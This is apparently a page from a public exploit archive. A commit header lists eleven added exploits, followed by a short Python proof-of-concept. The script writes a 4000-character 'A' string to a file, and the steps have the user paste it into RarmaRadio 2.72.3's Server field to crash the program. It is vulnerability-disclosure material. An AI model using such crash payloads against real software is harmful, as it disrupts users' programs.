edfd130ad1
11 changes to exploits/shellcodes BlueStacks 4.80.0.1060 - Denial of Service (PoC) RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC) RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC) TapinRadio 2.11.6 - 'Address' Denial of Service (PoC) TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC) Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting Carel pCOWeb < B1.2.1 - Cross-Site Scripting Carel pCOWeb < B1.2.1 - Credentials Disclosure Horde Webmail 5.2.22 - Multiple Vulnerabilities
22 lines
No EOL
663 B
Text
22 lines
No EOL
663 B
Text
#Exploit Title: RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2019-05-21
|
|
#Vendor Homepage: http://www.raimersoft.com/
|
|
#Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe
|
|
#Tested Version: 2.72.3
|
|
#Tested on: Windows 7 Service Pack 1 x64
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: rarmaradio_server.py
|
|
#2.- Open rarma_ser.txt and copy content to clipboard
|
|
#3.- Open RarmaRadio
|
|
#4.- Select "Edit" > "Settings" > "Network"
|
|
#5.- In "Server" field paste Clipboard
|
|
#6.- Select "OK"
|
|
#7.- Crashed
|
|
|
|
cod = "\x41" * 4000
|
|
|
|
f = open('rarma_ser.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |